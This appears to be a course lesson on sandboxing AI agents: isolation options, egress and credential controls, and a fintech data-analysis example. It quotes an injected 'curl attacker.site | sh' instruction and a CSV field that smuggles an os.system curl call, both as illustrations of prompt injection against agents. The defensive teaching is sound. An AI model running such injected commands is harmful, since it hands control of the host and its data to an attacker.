Course Content
Agentic AI Patterns
9 sections · 50 lessons
What is an execution environment in agent systems (e.g., sandboxing, secure runtimes)?
What you need to know
Why agents need a sandbox
Coding agents, data-analysis agents and computer-use agents run code or drive a desktop. That code was written by a model that may have read a malicious web page or file. Without isolation, one injected instruction like "run curl attacker.site | sh" becomes a real compromise.
Isolation options
| Option | Isolation strength | Start time | Notes |
|---|---|---|---|
| Plain container | Shares host kernel | Fast | Fine for trusted code only |
| Container plus gVisor | User-space kernel intercepts syscalls | Fast | Good default for untrusted code |
| MicroVM (Firecracker) | Separate kernel per sandbox | Well under a second | Strong isolation; common in hosted sandboxes |
| Full VM | Strongest | Slowest | Used for computer-use desktops |
What a good environment has
- One sandbox per session, destroyed at the end.
- Filesystem policy: read-only base image, a small writable scratch folder, no host mounts.
- Egress deny-by-default, with an allowlist of domains. This one control breaks most exfiltration attempts.
- No ambient credentials. Short-lived tokens, scoped to the requesting user, injected per call.
- Resource limits: CPU, memory, disk, process count, and a wall-clock timeout.
- Audit log of every command, file write and network call.
- Reproducibility: pinned image and captured inputs, so you can replay a run.
Computer-use agents
A computer-use agent sees screenshots and sends clicks and keystrokes. It should run in a disposable virtual desktop with only the needed apps, logged-out browsers where possible, and a human confirmation before purchases, sends or deletions.
A real-life example
A fintech gives analysts a data-analysis agent that writes and runs Python on uploaded CSVs of UPI transactions.
- Each chat gets a microVM with Python and pandas, 2 CPUs, 4 GB RAM and a 60-second limit per execution.
- No network at all. The uploaded file is copied in; results come out as files the host picks up.
- A user uploads a CSV where one merchant name is
"; import os; os.system('curl ...')". The model-written code only reads it as a string, and even if it ran, there is no network to reach. - One analyst's code loops forever on 8 million rows. The 60-second limit kills it and the agent is told "execution timed out; try sampling". It retries on a 5% sample.
Cost: a cold start adds about 300 ms to the first execution, which the team hides by starting the sandbox when the chat opens.
Follow-up questions to expect
- "Is Docker enough?" — For trusted code, often. For model-generated or user-supplied code, add a stronger boundary like gVisor or a microVM, because containers share the host kernel.
- "How does the agent keep files between sessions?" — Deliberately: write outputs to object storage or a database through a tool. Nothing on the sandbox disk survives.
- "How do you give the sandbox API access safely?" — Through a proxy on an allowlist, with short-lived tokens scoped to the user, never keys in environment variables.